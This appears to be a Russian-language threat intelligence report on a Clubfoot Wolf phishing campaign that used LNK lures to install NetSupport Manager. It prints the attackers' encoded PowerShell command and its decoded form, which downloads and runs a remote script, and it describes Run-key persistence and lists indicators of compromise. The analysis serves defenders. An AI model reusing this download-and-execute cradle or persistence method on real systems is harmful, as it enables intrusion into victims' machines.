Clubfoot Wolf массово компрометирует российские компании
Введение
Мы выяснили, что в мае и июне 2026 года кластер Clubfoot Wolf вел масштабную кампанию, нацеленную на российские организации из следующих сфер:
- обрабатывающая промышленность,
- розничная торговля,
- электронная коммерция,
- сельское хозяйство,
- IT,
- логистика,
- медицина,
- наука.
Основной мишенью стали российские компании, занимающиеся оптовой продажей химической продукции. Злоумышленники также атаковали несколько организаций из Республики Беларусь.
Для получения первоначального доступа Clubfoot Wolf рассылал фишинговые письма. Кластер доставлял в целевые системы легитимное ПО для удаленного администрирования NetSupport Manager, которое затем использовал для нанесения вреда.
Ключевые выводы
- Clubfoot Wolf активно использует NetSupport Manager как основную нагрузку. При этом злоумышленники экспериментируют со способами доставки ПО в целевые системы: модифицируют используемые цепочки заражения и методы маскировки вредоносной активности.
- Кластер использует сервисы сокращения ссылок, чтобы скрыть инфраструктуру доставки последующих стадий атаки, а также затруднить анализ и выявление конечных URL-адресов средствами защиты.
- Как и в ранее зафиксированных кампаниях, Clubfoot Wolf распространяет архивы с поддельными документами, имитируя деятельность российских организаций. Отвлекающие файлы используются, чтобы войти в доверие к жертве и убедить ее запустить вредоносное вложение.
Описание кампании
Фишинговое письмо
Для получения первоначального доступа Clubfoot Wolf рассылал фишинговые письма под предлогом запроса коммерческого предложения или выставления счета. В письмах злоумышленники представлялись сотрудниками компании, заинтересованной в закупке продукции у целевой организации.
К письмам был приложен ZIP‑архив, содержащий набор отвлекающих файлов и вредоносный LNK‑файл. Для рассылки фишинговых писем Clubfoot Wolf использовал почтовый сервис «Яндекс Почта».
ZIP‑архив
В рамках данной фишинговой кампании злоумышленники распространяли ZIP‑архивы, содержащие вредоносный LNK‑файл и два‑три отвлекающих файла различных форматов (PDF, JPG, PNG, DOC и DOCX).
Названия рассылаемых в фишинговых письмах ZIP‑архивов соответствуют шаблону: Заявка [название компании] [номер].zcodep.
Названия вредоносных LNK‑файлов соответствуют шаблону: Заявка на закупку от компании [название компании] на [год]г.lnk.
Названия отвлекающих файлов:
выписка [redacted] 21.09.21.pdfМаркетинговая карта ООО [redacted].docВыписка из [redacted].pdfРеквизиты ООО [redacted] (НОВЫЕ).docКарточка_предприятия.docxсв‑во о постановке на учет.jpgАнкета [redacted].pdfСвидетельство о постановке в [redacted].pdfКарточка_ООО_[redacted]_НОВАЯ.docСнимок экрана_2023‑07‑02_16‑04‑35.pngКарточка клиента ООО [redacted].docСвидетельство ИНН.jpgСвидетельство ОГРН.jpgИНН ОГРН Свидетельство о рег. в [redacted] от 16.04.2019.pdfКарточка организации АО [redacted].doc
Примеры отвлекающих файлов приведены ниже.
LNK‑файл
При запуске пользователем вредоносного LNK‑файла выполняется закодированная Base64‑команда в интерпретаторе PowerShell:
powershell.exe -E OwBHAGUAdAAtAEgAZQBsAHAAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtAGEAZwBhAHoAaQBuAGUAPQAiAGgAdAB0AHAAcwA6AC8ALwBjAHIAbwBwAC4AcwBoAC8ANgB6AFUAbwA4AE8AawAiADsAJABtAGEAcgBpAGUAPQAoAGcAYwBtACAAKgB2AG8AKgBwACoAcwAqAG4AKQAuAG4AYQBtAGUAOwAkAGMAbABhAGkAcgBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABNAFMAWABNAEwAMgAuAFMAZQByAHYAZQByAFgATQBMAEgAVABUAFAAOwAkAGMAbABhAGkAcgBlAC4AbwBwAGUAbgAoACIARwBFAFQAIgAsACAAJABtAGEAZwBhAHoAaQBuAGUALAAgACQAZgBhAGwAcwBlACkAOwAkAGMAbABhAGkAcgBlAC4AcwBlAG4AZAAoACkAOwAmACAAJABtAGEAcgBpAGUAIAAkAGMAbABhAGkAcgBlAC4AcgBlAHMAcABvAG4AcwBlAFQAZQB4AHQAOwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBHAG8AbwBkACAAcgBlAGEAZAAiADsAOwA= -W 1
PowerShell‑команда в декодированном и отформатированном виде:
Get-Help;
[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;
$magazine="hxxps://crop[.]sh/6zUo8Ok";
$marie=(gcm *vo*p*s*n).name;
$claire=New-Object -ComObject MSXML2.ServerXMLHTTP;
$claire.open("GET«, $magazine, $false);
$claire.send();
& $marie $claire.responseText;
Write-Host «Good read»;Данная команда выполняет HTTPS GET — запрос к удаленному ресурсу hxxps://crop[.]sh/6zUo8Ok (исходная ссылка: hxxps://sunlightfriends[.]tech/weather/news), получает содержимое ответа и передает его на исполнение через Invoke‑Expression. Таким образом реализуется бесфайловая (fileless) загрузка и выполнение следующей стадии непосредственно в памяти процесса PowerShell.
В рамках данной кампании Clubfoot Wolf активно использует сервис для укорачивания ссылок urlcrop.com.
PowerShell‑скрипт
Загруженный в память PowerShell‑скрипт представляет собой загрузчик (loader), содержащий PowerShell‑код, закодированный Base64 и зашифрованный AES‑128‑CBC с использованием PKCS7 Padding. После декодирования и расшифровки полученный PowerShell‑скрипт преобразуется в строку UTF‑8 и выполняется в памяти.
Декодированный и расшифрованный PowerShell‑скрипт имеет вид, представленный ниже.
Данный PowerShell‑скрипт выполняет следующие действия:
- Создает файл
%USERPROFILE%\Documents\TextDocument_N0213411.txtи записывает в него строку?????????—??? ????—?????????5432??? ???????337????????? ?????????? ??????-4322/31-25, ??????-P11311/233 Price. Затем файл открывается. Данная операция выполняется для отвлечения внимания жертвы и отображения файла с якобы закодированным или поврежденным содержимым. В других версиях PowerShell‑скрипта вместо этого осуществляется открытие ссылки на документ на «Яндекс Диске» в веб‑браузере по умолчанию, например$LAOJCm = «hxxps://disk.yandex[.]ru/i/RgUWO-uhakJF8w»; (New-Object -ComObject Shell.Application).Open($LAOJCm). - Загружает ZIP‑архив по ссылке
hxxps://crop[.]sh/OSRXf5B(исходная ссылка:hxxps://sunlightfriends[.]tech/weekly/forecast) и сохраняет его под случайным именем[A-Za-z0-9]{7}.zipв каталог%TEMP%, например%TEMP%\R7MIOBg.zip. В загруженном ZIP‑архиве содержатся файлы ПО удаленного администрирования NetSupport Manager. - Проверяет наличие каталога
%LOCALAPPDATA%\VoiceAssistant. При его отсутствии каталог создается. Далее PowerShell‑скрипт открывает ZIP‑архив как виртуальную папку файловой системы и выполняет скрытое копирование его содержимого в каталог%LOCALAPPDATA%\VoiceAssistant. - Декодирует и расшифровывает PowerShell‑код, отвечающий за запуск процесса
%LOCALAPPDATA%\VoiceAssistant\voiceassist.exe. После декодирования и расшифровки данный код выполняется. Исполняемый файлvoiceassist.exeявляется клиентом NetSupport Manager версии 14.2.0.966. - Декодирует и расшифровывает PowerShell‑код, отвечающий за закрепление NetSupport Manager в реестре ОС в ключе Run:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] VoiceAssistant = «%LOCALAPPDATA%\VoiceAssistant\voiceassist.exe.exe». После декодирования и расшифровки данный код выполняется. Стоит отметить, что в данном варианте атакующие допустили ошибку в названии исполняемого файлаvoiceassist.exe, указав двойное расширение .exe.exe. В других экземплярах указанная ошибка отсутствует и NetSupport Manager закрепляется в скомпрометированной системе успешно.
Архив с NetSupport Manager
Помимо основных компонентов ПО NetSupport Manager, загружаемый ZIP‑архив содержал набор файлов, заполненных автоматически сгенерированным бессмысленным текстом. Вероятно, указанные файлы были добавлены для изменения хеш‑суммы архива, а также придания ему вида легитимного программного дистрибутива.
Индикаторы компрометации
Хеш‑суммы файлов
b24b8d96ebea10cb7e9ffb73256cc46f9041123e7c2cc26fe92d355a8378a87c490585f82a0ddaafd9eead803859e06dafc0219a5bd1c08482c98f3d37eec231b90a7f17b5406db3ee17ec4bc82a704c6128b4ad8652776b4f55bc3948fa83850c2947904711ef63ac3cc24ba2e7a059e318dc219d14eeaebb6b46fd277f7f3d38d96dd1c26a7a98c8b55c925863d0f5c8c099a73192c65e3a1e47ea636d3d29100e0ca51a6a25efac16627be80c7ce992a5506470136e43cb8b24d8828ba82b11ad9f6c235ea561317d89590fa41d75348019850735b998b60661635ad99e9a03dbaee9cbc05abb6a35fd7804dcf7e83e0675da40eabcfd161d1d6b387363b36478585efed46b0616ca201c51464de7af5ba8985c3b948f9b67db09cbd62e970c2947904711ef63ac3cc24ba2e7a059e318dc219d14eeaebb6b46fd277f7f3de20c0900513551265dda37ce5334c71f5b0e8b20e19f9d8391f77987e2458f20
cee0ad69647d4840013e836b657d8fd79b9be7389ccbc70e15c5cb96bf926f8abea07bc2359e8f3ce914b0027b5548ae58c9a019f330446b2c81050cd9ca1b0db2e8f9f9a69c1be0d1814b064b73586afbf730e2ab9d9fb10dd5711be4febe8531b0f515012355e104a1e4f10baff85c3066a037f17272ce9c2445fd8377a96aaedcfbac94161f74b2ce63ad9da2f613809860fc8aa09d6ea0b57e964c47f8a820c8fd700796b80ea093e23ec812943adfc63c3b8653bb09b581fd7f4127c652c5a1dee1ae7f0a04dfa91481d0c1d5ad5c887a77e657def8878af600a98fd8c682671b7f09811ff38b3cab186776d06cc9e89d434080f1eb26fa1c35767eaca573bd4f12f3e7d155dfbcb6d016b99d40cce8554964ecc51de40b70fab3a4c3a520c8fd700796b80ea093e23ec812943adfc63c3b8653bb09b581fd7f4127c652
bed54c819cc8ff502fff41f6d9c726836b6086c9afdd47f2261809196c973c3879f169be997f883ef02559a0af3f014f63c1c0308931913decd79c0aafaf659f9fa461bd75788d27ceb778dc0f9773d641e804b3e10103c482ba4747153178f845154678b808a70316f0172a5012ffdfc7d7ddcde856440099fcdbad64e84ddb41c1b4b09cb3185075f57befd5278119ee0a952418144779898378f0963897e97b6f6fe88ff9d953965e81b1bed256528c93ff159156bc17b8811d7cfd5dfe4753c6a0a51ef3cf9d38034a7600c94e1ae3968dbec5bbb5d9fdcd26764c6b30e2644ad315071324e7f86e9b04dfc7dae515ca1a7ae386b21207c4ab38d1a164d63325be6c18c35b66e7f527950af97a4235e04d026a81780c135d6cec3f8245db4972b6583645d28600f076e73def05890b54a9d98c8b328d61f421c79a021db6b38032f5b2059cacc28246dd0b739e19b6a68daf34add740d5ce6be87354b4987f58b98e9d4b2d06dadef2b8656d337283118a135806dd711fb9de51ca63911dfb25a19a74bc7549f5e4e1f299886fb09a9d5b4fd4599c5a9b7f2d534ce716918fde3f60f9ae901a9fa04888d3050c9a65fb63722a4b41a6d6ad7d38183c37d5f15e4e140fceeb393bcb2c8d61a2333b37c30270527b5c48d8440e3ec1e02ae4cdf7c97cfb494ade90886765606294db0b98a2576bc1d152bc8c4ec97672b687fa877d45432e7712d1832508c77f063958a5cec05038152eb2be5e79992c3966644ad315071324e7f86e9b04dfc7dae515ca1a7ae386b21207c4ab38d1a164d653c6a0a51ef3cf9d38034a7600c94e1ae3968dbec5bbb5d9fdcd26764c6b30e2
fa07773b3af0539442504f86973fe2a68e040f80ebea388c5ed62d8f94eddb6ad3c90e61c3ffa059658c36e39334cb38c0b23cbde46f5078705fcfad67c9f3d86a8dfd602daa3b9dc2ceb146837a7966a37af8ab224ed11478e1f6d87f375b7f
c709c30074155f8f0a431828c23cc08df6959505051578ec28659a47a4da2fa6
Сетевые индикаторы
hxxps://crop[.]sh/6zUo8Okhxxps://crop[.]sh/OSRXf5Bhxxps://crop[.]sh/9hXkrRNhxxps://crop[.]sh/r1zUUv4hxxps://crop[.]sh/mD5Gmt2hxxps://crop[.]sh/KzcOSm7hxxps://crop[.]sh/0x47s6Bhxxps://crop[.]sh/72TT8cOhxxps://crop[.]sh/enuSDJGhxxps://crop[.]sh/OLiH8ADhxxps://crop[.]sh/NfhStZDhxxps://crop[.]sh/ncPHvl0hxxps://sunlightfriends[.]tech/weather/newshxxps://sunlightfriends[.]tech/weekly/forecasthxxps://sunlightfriends[.]tech/latest/newshxxps://sunlightfriends[.]tech/monthly/horoscopehxxps://sunlightfriends[.]tech/beauty/serieshxxps://sunlightfriends[.]tech/health/shampoohxxps://sunlightfriends[.]tech/world/libraryhxxps://sunlightfriends[.]tech/nature/todayhxxps://sunlightfriends[.]tech/learning/portalhxxps://fleepsterones[.]fun/fashion/weekhxxps://fleepsterones[.]fun/media/likehxxps://fleepsterones[.]fun/content/articleshxxps://disk.yandex[.]ru/i/6s3ZGTQf7T_P-ghxxps://disk.yandex[.]ru/i/RgUWO-uhakJF8w
fleepsterones[.]funsunlightfriends[.]tech
stillpaving[.]com:1411glowstickspro[.]com:1411imhfamily[.]com:1414akiliridge[.]com:1414
MITRE ATT&CK
| Тактика | Техника | Процедура |
|---|---|---|
|
Resource Development |
Acquire Infrastructure: Domains |
Clubfoot Wolf регистрирует домены в зонах .fun, .tech и .com |
|
Acquire Infrastructure: Virtual Private Server |
Clubfoot Wolf арендует виртуальные выделенные серверы для размещения на них своих инструментов, а также в качестве C2‑серверов NetSupport Manager |
|
|
Develop Capabilities: Malware |
Clubfoot Wolf разрабатывает вредоносные LNK‑файлы и PowerShell‑скрипты для доставки NetSupport Manager в целевые системы |
|
|
Establish Accounts: Email Accounts |
Clubfoot Wolf регистрирует почтовые адреса в почтовом сервисе «Яндекс Почта» |
|
|
Obtain Capabilities: Tool |
Clubfoot Wolf использует в атаках легитимное средство удаленного администрирования NetSupport Manager |
|
|
Stage Capabilities: Upload Malware |
Clubfoot Wolf размещает на своих сетевых ресурсах вредоносный PowerShell‑скрипт, который загружается и выполняется в памяти |
|
|
Stage Capabilities: Upload Tool |
Clubfoot Wolf размещает на своих сетевых ресурсах ZIP‑архив с ПО NetSupport Manager |
|
|
Stage Capabilities: Link Target |
Clubfoot Wolf использует сервис urlcrop.com для укорачивания ссылок |
|
|
Initial Access |
Phishing: Spearphishing Attachment |
Clubfoot Wolf распространяет ZIP‑архивы с ВПО, приложенные к фишинговым письмам |
|
Execution |
Command and Scripting Interpreter: PowerShell |
Clubfoot Wolf использует вредоносные LNK‑файлы для выполнения PowerShell‑команды: |
|
User Execution: Malicious File |
Компрометация системы инициируется при запуске пользователем вредоносного LNK‑файла, доставленного в рамках фишинговой атаки |
|
|
Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Clubfoot Wolf использует PowerShell‑скрипт для добавления ПО NetSupport Manager в автозагрузку системы через ключ реестра Run:
|
|
Stealth |
Deobfuscate/Decode Files or Information |
Clubfoot Wolf использует обфускацию в PowerShell-скриптах, включающую рандомизацию имен переменных, конкатенацию строк и защиту строковых констант посредством шифрования AES-128-CBC с последующим кодированием Base64 |
|
Hide Artifacts: Hidden Window |
Clubfoot Wolf скрытно выполняет PowerShell‑команду при запуске LNK‑файла, используя параметр |
|
|
Masquerading |
Clubfoot Wolf маскирует вредоносные LNK‑файлы под заявку на закупку: |
|
|
Masquerading: Match Legitimate Resource Name or Location |
Clubfoot Wolf копирует из загруженных ZIP‑архивов файлы ПО NetSupport Manger в каталог, мимикрирующий под легитимное ПО: Clubfoot Wolf создает параметры в ключе реестра Run, мимикрирующие под легитимное ПО:
|
|
|
Obfuscated Files or Information |
Clubfoot Wolf применяет обфускацию в PowerShell‑скриптах |
|
|
Obfuscated Files or Information: Command Obfuscation |
Clubfoot Wolf использует Base64 для кодирования PowerShell‑команд в LNK‑файлах |
|
|
Command and Control |
Application Layer Protocol: Web Protocols |
Clubfoot Wolf использует HTTP(S)‑протокол при обращении к своим сетевым ресурсам |
|
Encrypted Channel: Asymmetric Cryptography |
Clubfoot Wolf использует SSL‑/TLS‑шифрование при обращении к своим сетевым ресурсам |
|
|
Ingress Tool Transfer |
Clubfoot Wolf использует PowerShell‑скрипты для загрузки следующей стадии PowerShell‑скрипта и ZIP‑архива с NetSupport Manager |
|
|
Non‑Standard Port |
Clubfoot Wolf использует нестандартные сетевые порты для управляющих серверов NetSupport Manager: 1411, 1414 |
|
|
Remote Access Tools: Remote Desktop Software |
Clubfoot Wolf использует легитимное средство удаленного администрирования NetSupport Manager для управления скомпрометированным хостом |
|
|
Web Service |
Clubfoot Wolf использует облачное хранилище «Яндекс Диск» для размещения отвлекающих PDF‑документов |
Clubfoot Wolf активно использует в атаках фишинговые письма с вредоносными вложениями, а также регулярно изменяет применяемые техники. Остановить такие письма на входе в периметр помогает BI.ZONE Mail Security. Решение применяет более 100 механизмов фильтрации с использованием статистического, сигнатурного, лингвистического, контентного, эвристического анализа, YARA‑правил и машинного зрения. Дополнительно работают несколько AI‑моделей, а также встроена защита от петель в автоответах серверов и bounce‑сообщений. Это позволяет отсеивать нежелательные письма, не задерживая доставку легитимной почты.
Чтобы действовать проактивно и предотвращать развитие атак, важно знать методы и инструментарий злоумышленников. Портал BI.ZONE Threat Intelligence предоставляет актуальные данные об атакующих, их тактиках, техниках и используемых инструментах, а также рекомендации по обнаружению угроз. Это помогает компаниям интегрировать киберразведданные в процессы защиты от атак и предотвращать инциденты.